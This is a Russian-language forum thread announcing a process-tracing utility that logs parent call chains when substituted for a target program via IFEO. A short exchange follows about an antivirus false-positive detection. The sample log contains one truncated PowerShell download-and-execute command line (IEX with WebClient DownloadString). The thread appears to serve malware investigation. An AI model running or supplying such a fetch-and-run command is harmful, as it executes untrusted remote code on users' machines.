Snake (GetMyParent) 1.0

[Dragokas]

Dragokas добавил(а) новый ресурс:

Snake (GetMyParent) - Отслеживание цепочки вызовов процесса

Использование:
Подменить файл интересующего процесса на файл из ресурса (snake.exe) - физически, или через IFEO.

Логи:
Логи будут созданы рядом с программой с именем logfile(x).log - на каждый вызов отдельный лог.

Пример лога:

Спойлер

THIS PROCESS:
---
Command line: powershell  IEX (New-Object system.Net.WebClient).DownloadString
---
Name:         snake.exe
Path:         C:\Snake\snake.exe
Session:      1
PID:          5108
Parent PID:   4820
CreationTime: 7/6/2022...

Узнать больше об этом ресурсе...

 

[machito]

W32/Kryptik.AUU.gen!Eldorado ложный детект?

VirusTotal

VirusTotal

www.virustotal.com

 

[Dragokas]

У меня зачем спрашиваешь? Спроси у них.

 

[machito]

У меня зачем спрашиваешь? Спроси у них.

@Dragokas, вопрос не личный а ко всем кто читает.

 

[Dragokas]

Из компании Cyren никто не читает, поэтому отправлять надо им.

 

[machito]

Из компании Cyren никто не читает

Помню не так давно на gsm форуме тоже было аналогичное происшествие, только от серьезного продукта каспера. Прога ЕМТ tool для прошивок смартфонов, народу пользуется естественно ооочень много, я не долго думая написал им... ответили культурно извинились... детекта нет. По этому писать должны разрабы, то есть, ты друг.

 

[Dragokas]

Я никому ничего не должен. Если человеку не нравится, то это его проблемы. Я никого не заставляю.